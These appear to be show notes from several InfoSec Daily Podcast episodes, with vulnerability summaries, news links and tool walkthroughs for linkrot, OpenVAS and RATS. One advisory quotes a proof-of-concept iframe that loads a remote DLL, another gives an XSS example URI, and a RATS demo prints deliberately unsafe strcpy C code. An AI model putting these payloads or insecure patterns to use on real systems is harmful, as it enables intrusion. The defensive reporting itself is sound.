Example:         linkrot.exe http://www.linkrot.be/
Example:         linkrot.exe http://www.linkrot.be/ >> logfile.txt

Error level -1:  Parameter fault, given url is not accessible.
Error level  0:  All went well, no bad links found.
Error level  1:  Bad links found, see error log for details.

Comments to info@patrick.nl, www.patrick.nl.

C:\Users\rhayes\Downloads>linkrot http://www.irongeek.com >>logfile.txt

logfile.txt:
Resolved  http://www.irongeek.com/
Resolved  http://www.dreamhost.com/r.cgi?155413
Resolved  http://www.irongeek.com/i.php
Resolved  http://www.irongeek.com/i.php?page=security/hackingillustrated
Resolved  http://www.irongeek.com/i.php?page=security/security
Resolved  http://www.irongeek.com/i.php?page=mobile-device-hacking
Resolved  http://www.irongeek.com/i.php?page=security/code
Resolved  http://www.irongeek.com/i.php?page=reviews/reviews
Resolved  http://feedproxy.google.com/IrongeeksSecuritySite
Resolved  http://www.irongeek.com/browserinfo.php
Resolved  http://www.irongeek.com/security-podcasts.php
Resolved  http://www.irongeek.com/i.php?page=hoosier
Resolved  http://www.irongeek.com/newscat.php
Resolved  http://www.irongeek.com/i.php?page=links
Resolved  http://www.irongeek.com/i.php?page=contact
Resolved  http://www.irongeek.com/i.php?page=forum/index
Resolved  http://www.irongeek.com/i.php?page=workout/workout
Resolved  http://www.irongeek.com/i.php?page=fitness/nutrition
Resolved  http://www.irongeek.com/i.php?page=fitness/supplements
Resolved  http://www.irongeek.com/i.php?page=humor/humor
Resolved  http://www.irongeek.com/i.php?page=advertise
Resolved  http://www.irongeek.com/i.php?page=hire-adrian-for-security-or-tech-w
Resolved  http://www.irongeek.com/i.php?page=campuses-that-use-irongeek-for-tea
Resolved  http://www.irongeek.com/fed-watch.php

Links.txt
Status    Found on page    Link    Milliseconds    Content type
Resolved    http://www.irongeek.com/    http://www.irongeek.com/    9219    text/html
Resolved    http://www.irongeek.com/    http://www.dreamhost.com/r.cgi?155413    2958    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php    1375    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=security/hackingillustrated    1415    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=security/security    1876    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=mobile-device-hacking    3471    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=security/code    755    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=reviews/reviews    765    text/html
Resolved    http://www.irongeek.com/    http://feedproxy.google.com/IrongeeksSecuritySite    12794    text/xml; charset=UTF-8
Resolved    http://www.irongeek.com/    http://www.irongeek.com/browserinfo.php    1620    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/security-podcasts.php    5396    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=hoosier    283    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/newscat.php    453    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=links    221    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=contact    261    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=forum/index    140    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=workout/workout    342    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=fitness/nutrition    145    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=fitness/supplements    309    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=humor/humor    215    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=advertise    183    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana    169    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education    210    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/fed-watch.php    3629    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=books    466    text/html
Resolved    http://www.irongeek.com/    http://www.printfection.com/irongeek/    5934    text/html; charset=UTF-8
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=about    1824    text/html

Error.txt:
Error message    Found on page    Bad link    Milliseconds
Timeout    http://www.irongeek.com/    http://www.packetsniffers.org/    21495
Timeout    http://www.irongeek.com/    http://hackhound.org/    21106
Timeout    http://www.irongeek.com/    http://hackhound.org/images/button2.gif    21007
NotFound    http://www.irongeek.com/i.php?page=security/hackingillustrated    http://leebaird.com/Me/Hacking.html    559
Timeout    http://www.irongeek.com/i.php?page=security/hackingillustrated    http://phreaknic.wilpig.org/    21208

Linkrot is available in command-line utility and source code from here: Linkrot

InfoSec Daily Podcast

Vulnerabilities of Interest:

1. file CDF File Parsing Multiple Buffer Overflow Vulnerabilities – The ‘file’ command is prone to multiple buffer-overflow vulnerabilities because it fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. Versions prior to ‘file’ 5.02 are vulnerable.
2. Sun Java Runtime Environment Multiple Unspecified Same Origin Policy Violation Vulnerabilities – Sun Java Runtime Environment is prone to multiple unspecified vulnerabilities that allow attackers to bypass the same-origin policy. This issue occurs because the application fails to properly enforce the same-origin policy for Java applets. An attacker may create a malicious applet that is loaded from a remote system to circumvent network access restrictions. The following are affected: JDK and JRE 6 Update 6 and earlier, JDK and JRE 5.0 Update 15 and earlier, SDK and JRE 1.4.2_17 and earlier SDK and JRE 1.3.x_22 and earlier
3. Sun Java Runtime Environment XML Data Processing Multiple Vulnerabilities – Sun Java Runtime Environment is prone to multiple remote vulnerabilities. An attacker can exploit these issues to obtain sensitive information or crash the affected application, denying service to legitimate users. These issues affect the following versions on Solaris, Linux, and Windows platforms: JDK and JRE 6 Update 6 and earlier as well as JDK and JRE 5.0 Update 15 and earlier
4. Sun Java SE Java Management Extensions (JMX) Unspecified Unauthorized Access Vulnerability – JMX is prone to an unspecified unauthorized-access vulnerability.  The vulnerability allows a JMX client to perform unauthorized actions on a computer running JMX with local monitoring enabled. The issue affects the following versions for Windows, Solaris, and Linux: JDK and JRE 6 Update 6 and earlier as well as  JDK and JRE 5.0 Update 15 and earlier
5. Sun Java Runtime Environment Virtual Machine Privilege Escalation Vulnerability – Sun Java Runtime Environment Virtual Machine is prone to a privilege-escalation vulnerability when running untrusted applications or applets. Successful exploits may allow attackers to read, write, or execute arbitrary local files in the context of the user running an untrusted application in the affected virtual machine. This may result in a compromise of the underlying system. This issue affects the following versions: JDK and JRE 6 Update 6 and earlier, JDK and JRE 5.0 Update 15 and earlier SDK and JRE 1.4.2_17 and earlier
6. Hitachi Multiple Products Remote Code Execution Vulnerabilities – Multiple products from Hitachi are prone to multiple code-execution vulnerabilities. A remote attacker could exploit these issues by enticing a victim to open a malicious file. Successfully exploiting these issues would allow the attacker to execute arbitrary code in the context of the currently logged-in user or cause denial-of-service conditions.
7. IBM Installation Manager ‘iim://’ URI Handling Remote Code Execution Vulnerability – IBM Installation Manager is prone to a remote code-execution vulnerability. Attackers could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions. The following products that include Installation Manager are vulnerable: IBM Rational Robot and IBM Rational Team Concer. The following proof of concept is available:  &lt;iframe src=’iim://” -vm \\www.example.com\uncshare\sh.dll -url “‘&gt;&lt;/iframe&gt; Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
8. Omni-NFS Multiple Stack Buffer Overflow Vulnerabilities – Omni-NFS is prone to multiple stack-based buffer-overflow vulnerabilities because the application fails to properly bounds-check user-supplied network data before copying it into an insufficiently sized memory buffer. The issues affect both server and client. Exploiting these issues allows attackers to execute arbitrary machine code in the context of users running the affected application. Failed attempts will likely crash the application, resulting in denial-of-service conditions. Omni-NFS 5.2 is vulnerable; other versions may also be affected. Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. There are also exploits are available in the wild.
9. Hitachi Device Manager IPv6 Security Bypass Vulnerability – Hitachi Device Manager and JP1/HiCommand are prone to a security-bypass vulnerability because of an unspecified error related to IPv6 functionality. Very few technical details are available as of now though we will continue to monitor this one. Hitachi Multiple Products GIF File Parsing Buffer Overflow Vulnerability – Multiple Hitachi products, including Cosminexus, Processing Kit for XML, and Hitachi Developer’s Kit for Java, are prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
10. Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability – The Apache ‘mod_proxy_ftp’ module is prone to a denial-of-service vulnerability because of a NULL-pointer dereference. Successful exploits may allow remote attackers to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.  A working commercial exploit is available through Intevydis otherwise no publicly available or known to be circulating in the wild.
11. WebKit Preflight Request Same-Origin Policy Bypass Vulnerability – WebKit is prone to a vulnerability that lets attackers bypass the same-origin policy.  Attackers can exploit this issue to access resources from another origin in the context of another domain. This can facilitate cross-site request-forgery attacks.
12. Sun Solaris Samba Information Disclosure and Denial of Service – Sun has acknowledged some vulnerabilities in Samba in Solaris, which can be exploited by malicious users to disclose sensitive information and cause a DoS (Denial of Service).

News Items of Interest:

News item 1: (http://www.theglobeandmail.com/news/technology/rim-security-chief-warns-of-future-smart-phone-attacks/article1368297/)

News item 2: (http://www.h-online.com/security/news/item/Fedora-12-allows-users-install-privilege-Update-863623.html)

News item 3: (http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1374839,00.html)

News item 4: (http://www.reuters.com/article/rbssTechMediaTelecomNews/idUSPEK26455220091119?rpc=401)

News item 5: (http://www.cio.com/article/508029/How_to_Hack_China_for_Just_1_800?source=rss_security)

News item 6: (http://www.informationweek.com/news/government/policy/showArticle.jhtml?articleID=221900107)

Tech Segment:

PDFResurrect is a tool aimed at analyzing PDF documents. The PDF format allows for previous document changes to be retained in a more recent version of the document, thereby creating a running history of changes for the document. This tool attempts to extract all previous versions while also producing a summary of changes between versions. This tool can also “scrub” or write data over the original instances of PDF objects that have been modified or deleted, in an effort to disguise information from previous versions that might not be intended for anyone else to read.

This project is released under the GNU GPLv3 license. So have at it!

Download PDFResurrect v0.9

InfoSec Daily Podcast

Vulnerabilities of Interest:

1. Kolab Server ClamAV Archive Handling Security Bypass – Some security issues have been reported in Kolab Server, which can potentially be exploited by malware to bypass certain security restrictions. The security issues are caused due to errors in the handling of certain file types in combination with ClamAV. This can be exploited to bypass security restrictions specified for certain files. Solution is to upgrade the ClamAV package to version 0.95.3.
2. Kaspersky Anti-Virus 2010 kl1.sys Denial of Service Vulnerability -A vulnerability has been discovered in Kaspersky Anti-Virus 2010, which can be exploited by malicious, local users to cause a DoS (Denial of Service).  The vulnerability is caused due to an error in the kl1.sys driver when handling IOCTLs. This can be exploited to dereference invalid memory and cause a kernel crash via a specially crafted 0x0022C008 IOCTL. The vulnerability is confirmed in version 9.0.0.463. Other versions may also be affected.  Solution is to update to version 9.0.0.736.
3. Sun Java SE Multiple Security Vulnerabilities – Sun has released updates to address multiple vulnerabilities in Java SE. Very little technical information is currently available on these issues. These issues are addressed in the following releases: JDK and JRE 6 Update 15, JDK and JRE 5.0 Update 20, SDK and JRE 1.4.2_22 and SDK and JRE 1.3.1_26
4. Serv-U Web Client HTTP Request Remote Buffer Overflow Vulnerability – Serv-U Web Client is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. Serv-U Web Client 9.0.0.5 is vulnerable; other versions may also be affected. Exploits are available in the wild.
5. RhinoSoft Serv-U FTP Server TEA Decoder Remote Stack Buffer Overflow Vulnerability – RhinoSoft Serv-U FTP Server is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. Serv-U 9.0.0.5 is vulnerable; other versions may also be affected.
6. Sun Java Web Start and Java Plug-in JAR File Privilege Escalation Vulnerability – Sun Java Web Start and Java Plug-in are prone to a privilege-escalation vulnerability. This issue occurs when the affected applications parse a JAR file that is also a legitimate GIF image file. An attacker may exploit this issue to obtain sensitive information (such as HTTP session cookies) or to perform actions as legitimate users of a web application. This may aid in further attacks. NOTE: This issue was previously covered in BID 32620 (Sun Java Web Start and Java Plug-in Multiple Privilege Escalation Vulnerabilities), but has been given its own record to better document the issue. The following versions are affected: JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier, and SDK and JRE 1.3.1_23 and earlier
7. IBM SolidDB ‘solid.exe’ Denial of Service Vulnerability – IBM SolidDB is prone to a remote denial-of-service vulnerability. An attacker may leverage this issue to crash the affected application, denying service to affected users. This issue affects SolidDB 6.30.0.29 and 6.30.0.33; other versions may also be affected.  Exploits are available in the wild.
8. Multiple Vendor TLS Protocol Session Renegotiation Security Vulnerability – Same deal just more vendors being added.  Again check with your vendor on this for updates.

News Items of Interest:

News item 1: (http://www.domainb.com/infotech/itnews/20091117_indo-pak_cyber_war.html)

News item 2: (http://www.networkworld.com/news/2009/111709-endpoint-security.html)

News item 3: (http://www.jdjournal.com/2009/11/17/hackers-targeting-large-law-firms-in-increasing-numbers/)

News item 4:(http://www.out-law.com//default.aspx?page=10530)

News item 5: (http://www.pcadvisor.co.uk/news/index.cfm?…id=3206496&)

News item 6: (http://www.infoworld.com/d/security-central/64-bit-windows-safer-claims-microsoft-787?source=rss_infoworld_news)

Tech Segment:

OpenVAS

OpenVAS is a new security assessment tool designed as an alternative to Nessus.  According to the OpenVAS website:

Once you get BackTrack up and running, you can login with root (password: toor) by default.  Launch Firefox to so that we can grab the latest version of the OpenVAS packages from the following website: apt.intevation.de/dists/lenny/openvas/binary-i386/?1246159210

libopenvas2_2.0.4-1intevation1_i386.deb
libopenvasnasl2_2.0.2-1intevation1_i386.deb
openvas-client_2.0.5-1intevation1_i386.deb
openvas-plugins_1.0.6-1intevation2_i386.deb
openvas-server_2.0.3-1intevation1_i386.deb

Grab the Pth, GD and GNOME wrapper libraries:
packages.debian.org/lenny/i386/libpth20/download
packages.debian.org/lenny/i386/libgpgme11/download
packages.debian.org/lenny/i386/libgdchart-gd2-noxpm/download

Finally, you will need to grab HTMLDOC: htmldoc.org/software.php?VERSION=1.9.x-r1586&FILE=htmldoc/snapshots/htmldoc-1.9.x-r1586.tar.gz

wget http://apt.intevation.de/dists/lenny/openvas/binary-i386/libopenvas2_2.0.4-1intevation1_i386.deb
wget http://apt.intevation.de/dists/lenny/openvas/binary-i386/libopenvasnasl2_2.0.2-1intevation1_i386.deb
wget http://apt.intevation.de/dists/lenny/openvas/binary-i386/openvas-client_2.0.5-1intevation1_i386.deb
wget http://apt.intevation.de/dists/lenny/openvas/binary-i386/openvas-plugins_1.0.6-1intevation2_i386.deb
wget http://apt.intevation.de/dists/lenny/openvas/binary-i386/openvas-server_2.0.3-1intevation1_i386.deb
wget http://http.us.debian.org/debian/pool/main/p/pth/libpth20_2.0.7-12_i386.deb
wget http://http.us.debian.org/debian/pool/main/g/gpgme1.0/libgpgme11_1.1.6-2_i386.deb
wget http://http.us.debian.org/debian/pool/main/libg/libgdchart-gd2/libgdchart-gd2-noxpm_0.11.5-6_i386.deb
wget ftp://nic.funet.fi/.m/mirrors2/ftp.easysw.com/pub/htmldoc/snapshots/htmldoc-1.9.x-r1586.tar.gz

Open the terminal and run the following commands in order:

dpkg -i libopenvas2_2.0.4-1intevation1_i386.deb
ldconfig
dpkg -i libpth20_2.0.7-12_i386.deb
dpkg -i libgpgme11_1.1.6-2_i386.deb
dpkg -i libopenvasnasl2_2.0.2-1intevation1_i386.deb
dpkg -i openvas-plugins_1.0.6-1intevation2_i386.deb
dpkg -i openvas-server_2.0.3-1intevation1_i386.deb
dpkg -i libgdchart-gd2-noxpm_0.11.5-6_i386.deb
dpkg -i openvas-client_2.0.5-1intevation1_i386.deb
tar -zxvf htmldoc-1.9.x-r1586.tar.gz
cd htmldoc-1.9.x-r1586
./configure
make
make install
openvas-adduser

oot@bt:~/htmldoc-1.9.x-r1586# openvas-adduser
/usr/sbin/openvas-adduser: 75: 0: not found
Using /var/tmp as a temporary file holder.

Add a new openvasd user
———————————


Login : admin
Authentication (pass/cert) [pass] : pass
Login password :
Login password (again) :

User rules
—————
openvasd has a rules system which allows you to restrict the hosts that admin has the right to test.
For instance, you may want him to be able to scan his own host only.

Please see the openvas-adduser(8) man page for the rules syntax.

Enter the rules for this user, and hit ctrl-D once you are done:
(the user can have an empty rules set)



Login             : admin
Password          : ***********

Rules             :



Is that ok? (y/n) [y] y
user added.

openvas-mkcert

root@bt:~/htmldoc-1.9.x-r1586# openvas-mkcert
/usr/sbin/openvas-mkcert: 85: 0: not found
——————————————————————————-
Creation of the OpenVAS SSL Certificate
——————————————————————————-

This script will now ask you the relevant information to create the SSL certificate of OpenVAS.
Note that this information will *NOT* be sent to anybody (everything stays local), but anyone with the ability to connect to your OpenVAS daemon will be able to retrieve this information.


CA certificate life time in days [1460]:
Server certificate life time in days [365]:
Your country (two letter code) [FR]: US
Your state or province name [none]:
Your location (e.g. town) [Paris]: Atlanta
Your organization [OpenVAS Users United]:






——————————————————————————-
Creation of the OpenVAS SSL Certificate
——————————————————————————-

Congratulations. Your server certificate was properly created.

/etc/openvas/openvasd.conf updated
The following files were created:

. Certification authority:
Certificate = /var/lib/openvas/CA/cacert.pem
Private key = /var/lib/openvas/private/CA/cakey.pem

. OpenVAS Server :
Certificate = /var/lib/openvas/CA/servercert.pem
Private key = /var/lib/openvas/private/CA/serverkey.pem

Press [ENTER] to exit

openvas-nvt-sync

Start the OpenVAS server by typing the command “openvasd” in the terminal.  Open the OpenVAS Client by clicking on the Start button, going to Internet, and then clicking on OpenVAS-Client. Choose File > Connect and Enter the username and password which you created earlier. Wait for the client to connect to the server and then click File and then Scan Assistant.

Enter “localhost” to target your own computer for a scan.  Click the Execute button and once the scan is completed you will see “Report” followed by the date in the left pane of the OpenVAS client. Click on the report, and you can explore the report results in the middle and right panes of the client. You can also click on Report on the top command line of the OpenVAS client and click Print to make a pdf copy of the report.

InfoSec Daily Podcast

Vulnerabilities of Interest:

1. Gimp PSD Image Parsing Integer Overflow Vulnerability – Secunia Research has discovered a vulnerability in Gimp, which potentially can be exploited by malicious people compromise a user’s system. The vulnerability is caused due to an integer overflow within the “read_channel_data()” function in plug-ins/file-psd/psd-load.c. This can be exploited to cause a heap-based buffer overflow by e.g. tricking a user into opening a specially crafted PSD file. The vulnerability is confirmed in version 2.6.7. Other versions may also be affected.
2. Linux Kernel KVM MCE “KVM_X86_SETUP_MCE” Buffer Overflow – A vulnerability has been reported in the Linux Kernel, which can be exploited by malicious, local users to cause a DoS (Denial of Service) and potentially gain escalated privileges. The vulnerability is caused due to an error within the “kvm_vcpu_ioctl_x86_setup_mce()” function in arch/x86/kvm/x86.c. This can be exploited to corrupt kernel memory by e.g. sending a specially crafted “KVM_X86_SETUP_MCE” IOCTL. Fixed in version 2.6.32.-rc7.
3. avast! Home/Professional aswRdr.sys Memory Corruption Vulnerability -  A vulnerability has been discovered in avast! Home/Professional, which can be exploited by malicious, local users to cause a DoS (Denial of Service) or potentially gain escalated privileges. The vulnerability is caused due to an error in aswRdr.sys when processing IOCTLs. This can be exploited to corrupt kernel memory via a specially crafted 0×80002024 IOCTL.
4. Home FTP Server “SITE INDEX” Denial of Service – A vulnerability has been discovered in Home FTP Server, which can be exploited by malicious users to cause a DoS (Denial of Service). The vulnerability is caused due to an error in the handling of multiple “SITE INDEX” commands and can be exploited to stop the server. The vulnerability is confirmed in version 1.10.1.139. Other versions may also be affected. The currently offered solution is to restrict access to trusted users only.
5. HP OpenView Network Node Manager ‘ovdbrun.exe’ Denial of Service Vulnerability – HP OpenView Network Node Manager (NNM) is prone to a remote denial-of-service vulnerability. An attacker may leverage this issue to crash the affected application, denying service to affected users. The issue affects NNM 7.51 and 7.53.  Exploit is available in the wild.
6. HP Discovery & Dependency Mapping Inventory Arbitrary Code Execution – A vulnerability has been reported in HP Discovery & Dependency Mapping Inventory (DDMI), which can be exploited by malicious users to compromise a vulnerable system. The vulnerability is caused due to an unspecified error and can be exploited to execute arbitrary code.  The vulnerability is reported in HP Discovery & Dependency Mapping Inventory (DDMI) versions 2.5x, 7.5x, and 7.60, running on Windows.  Solution is to apply patches.
7. Warcraft III JASS Interpreter Arbitrary Code Execution – Some vulnerabilities have been reported in Warcraft III: The Frozen Throne, which can be exploited by malicious people to potentially compromise a user’s system. The vulnerabilities are caused due to errors within the JASS script handling, which can be exploited to e.g. execute arbitrary code by tricking a user into loading a specially crafted map. Partially fixed in version 1.24b.

News Items of Interest:

News item 1: (http://community.zdnet.co.uk/blog/0,1000000567,10014468o-2000331761b,00.htm?s_cid=292)

News item 2: (http://isc.sans.org/diary.html?storyid=7603&rss)

OpenVPN recommend upgrading to version 2.1_rc21 which is available here.

Additional information regarding OpenVPN session renegotiation is available here.
News item 3: (http://www.wtop.com/?nid=108&sid=1814785)
News item 4: (http://www.metasploit.com/framework/download)
After 12 months of development, version 3.3 of the Metasploit Framework has been released. Version 3.3 includes 120 new exploit modules, over 100 new auxiliary modules, and 180 bug fixes.

News item 5: (http://www.businesswire.com/portal/site/topix/?dmViewId=news_view&newsId=20091117005045&newsLang=en)

For more information and insight from DeepNines Security Lab: http://www.deepnines.com/security-lab/deepnines-security-labs.
News item 6: (http://www.infosecurity-magazine.com/view/5280/astaro-joins-free-it-security-software-industry-to-boost-profile/)

The software is available in two flavours: software appliance and virtual appliance.

News item 7: http://blogs.zdnet.com/security/?p=4956&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+zdnet%2Fsecurity+%28ZDNet+Zero+Day%29

Tech Segment:

Rough Auditing Tool for Security. RATS (Rough Auditing Tool for Security), is a tool for scanning C, C++, Perl, PHP and Python source code and flagging common security related programming errors such as buffer overflows and TOCTOU (Time Of Check, Time Of Use) race conditions. RATS scanning tool provides a security analyst with a list of potential trouble spots on which to focus, along with describing the problem, and potentially suggest remedies. It also provides a relative assessment of the potential severity of each problem, to better help an auditor prioritize. This tool also performs some basic analysis to try to rule out conditions that are obviously not problems.  RATS is free software, under the terms of the GNU Public License.

RATS requires expat to be installed in order to build and run. Expat is often installed in /usr/local/lib and /usr/local/include. On some systems, you will need to specify —with-expat-lib and —with-expat-include options to configure so that it can find your installation of the library and header. More Info: http://expat.sourceforge.net/

C:\Hold\rats-2.3-win32\rats-2.3>rats -h
RATS v2.3 – Rough Auditing Tool for Security
Copyright 2001, 2002 Secure Software Inc

http://www.securesoftware.com

usage: rats [-adhilrwxR] [--help] [--database|--db]  name1 name2 … namen

-a <fun>       report any occurence of function ‘fun’ in the source file(s)
-d <filename>  specify an alternate vulnerability database.
–db
–database
-h             display usage information (what you’re reading)
–help
-i             report functions that accept external input
–input
-l <language>  force the specified langauge to be used
–language <language>
-r             include references that are not function calls
–references
-w <1,2,3>     set warning level (default 2)
–warning <1,2,3>
-x             do not load default databases
-R             don’t recurse subdirectories scanning for matching files
–no-recursion
–xml          Output in XML.
–html         Output in HTML.
–follow-symlinks
Follow symlinks and process files found.
–noheader
Don’t print initial header in output
–nofooter
Don’t show timing information footer at end of analysis
–quiet
Don’t print status information regarding what file is being analyzed
–resultsonly
No header, footer, or status information
–columns
Show column number of hte line where the problem occured.
–context
Display the line of code that caused the problem report

So just running rats.exe without any flags, provides you with stats on the database:

C:\Hold\rats-2.3-win32\rats-2.3>rats
Entries in perl database: 33
Entries in ruby database: 46
Entries in python database: 62
Entries in c database: 334
Entries in php database: 55
Total lines analyzed: 0
Total time 0.000000 seconds
-2147483648 lines per second

sample.c:

int login(const char *user, const char *pass)

{

int authenticated = 0;

char username[16];

char password[16];

strcpy (username, user);

strcpy (password, pass);

if (passwordLookup(&username, &password))

{

authenticated = 1;

}

return authenticated;

}

C:\Hold\rats-2.3-win32\rats-2.3>rats -l c sample.c
Entries in perl database: 33
Entries in ruby database: 46
Entries in python database: 62
Entries in c database: 334
Entries in php database: 55
Analyzing sample.c
sample.c:4: High: fixed size local buffer
sample.c:5: High: fixed size local buffer
Extra care should be taken to ensure that character arrays that are allocated
on the stack are used safely.  They are prime targets for buffer overflow
attacks.

sample.c:6: High: strcpy
sample.c:7: High: strcpy
Check to be sure that argument 2 passed to this function call will not copy
more data than can be handled, resulting in a buffer overflow.

Total lines analyzed: 13
Total time 0.032000 seconds
406 lines per second

htpasswd.c analyzed:

C:\Hold\rats-2.3-win32\rats-2.3>rats -l c htpasswd.c
Entries in perl database: 33
Entries in ruby database: 46
Entries in python database: 62
Entries in c database: 334
Entries in php database: 55
Analyzing htpasswd.c
htpasswd.c:30: High: fixed size local buffer
htpasswd.c:38: High: fixed size local buffer
htpasswd.c:39: High: fixed size local buffer
htpasswd.c:50: High: fixed size local buffer
Extra care should be taken to ensure that character arrays that are allocated
on the stack are used safely.  They are prime targets for buffer overflow
attacks.

htpasswd.c:33: High: fprintf
Check to be sure that the non-constant format string passed as argument 2 to
this function call does not come from an untrusted source that could have added
formatting characters that the code is not prepared to handle.

htpasswd.c:58: High: strcpy
Check to be sure that argument 2 passed to this function call will not copy
more data than can be handled, resulting in a buffer overflow.

Total lines analyzed: 134
Total time 0.031000 seconds
4322 lines per second

Download Source tarball: rats-2.3.tar.gz

Download Win32 binary: rats-2.3-win32.zip

InfoSec Daily Podcast

Announcements:

A quick reminder about the DC404 meeting this Saturday 2PM @ the Vortex Midtown.

Vulnerabilities of Interest:

1. Wikipedia Toolbar Remote Code Execution Vulnerability – The Wikipedia Toolbar add-on for Firefox is prone to a remote code-execution vulnerability; fixes are available. Attackers can exploit this issue to execute arbitrary JavaScript code with chrome privileges, which may result in a compromise of the affected computer. The issue affects Wikipedia Toolbar 0.5.9; other versions may also be affected.  The vendor fixed the issue in the experimental version 0.5.9.2.
2. Linux Kernel ‘nfs4_proc_lock()’ Local Denial of Service Vulnerability – The Linux kernel is prone to a local denial-of-service vulnerability.  Attackers can exploit this issue to cause the kernel to panic, denying service to legitimate users. Versions prior to Linux kernel 2.6.31-rc4 are vulnerable.
3. Linux Kernel ‘pipe.c’ Local Privilege Escalation Vulnerability – Linux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference. Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.   Exploits are available: 36901.sh 36901.py 36901-1.c 36901-2.c. Updates are available from the vendors.
4. CUPS ‘kerberos’ Parameter Cross Site Scripting Vulnerability – CUPS is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.  An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Note: This vulnerability was originally reported in BID 36956 (Apple Mac OS X 2009-006 Multiple Security Vulnerabilities), but has been given its own record to better document it.  This issue affects CUPS versions prior to 1.4.2.  Attackers can exploit this issue by enticing an unsuspecting victim into following a malicious URI. The following example URI is available: http://www.example.com/admin/?kerberos=onmouseover=alert
5. Samba Oplock Break Notification Remote Denial of Service Vulnerability – Samba is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause the application to consume excessive CPU resources, denying service to legitimate users. Versions prior to Samba 3.4.2, 3.3.8, 3.2.15, and 3.0.37 are vulnerable.  To exploit this issue, attackers can use readily available network utilities.
6. Novell eDirectory Multiple Vulnerabilities – Novell eDirectory is prone to multiple buffer-overflow and denial-of-service vulnerabilities. Successful exploits may allow attackers to execute arbitrary code within the context of the affected application or cause denial-of-service conditions. These issues affect eDirectory 8.8 SP3 and 8.8 SP3 FTF3.

News Items of Interest:

Item 1: (http://www.pcworld.com/article/182180/top_5_social_engineering_exploit_techniques.html?tk=rss_news)

Item 2:(http://jeremiahgrossman.blogspot.com/2009/11/owasp-top-10-2010-release-candidate-1.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+JeremiahGrossman+%28Jeremiah+Grossman%29)

Download URL http://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf

News item 3: (http://www.phiprivacy.net/?p=1294)

News item 5: (http://www.securegoose.org/2009/11/tls-renegotiation-vulnerability-cve.html)

News item 6: (http://www.v3.co.uk/v3/news/2253269/mcafee-warns-cyber-warfare)

If you are interested in a Nepenthes VM then you can find one here: http://www.sparsa.org/drupal/?q=node/11

News item 8: ( http://www.theregister.co.uk/2009/11/17/bank_of_america_skimming_plea/)

Tech Segment:

• Support for 802.11 Wireless Capture – initially supported under the portable NextGen Eagle platform, this capability will be available on all NextGen 9.0 capture platforms. This new capability supports WEP in-line decryption, and will support WPA decryption under an upcoming service pack.
• 10 Gbps Network Support – building off of real-world experiences with massive government, commercial and service provider networks, unlike other products in this space, NextGen 9.0 includes support for both capture and real-time analysis on 10 Gbps networks.
• Expanded authentication options – NextGen 9.0 supports Linux PAM, providing pluggable authentication modules that connect the NextGen infrastructure to customer authentication frameworks such as Kerberos for Windows and Unix environments, LDAP, Radius and many others.
• Expanded enterprise management – NextGen 9.0 introduces a new administrative dashboard that enables comprehensive insight into global health across all connected appliances. This includes real-time feedback and charting for all system metrics, and expanded interfaces for managing configuration parameters, rules, alerts, parsers, feeds, and software updates across all devices from a single location.
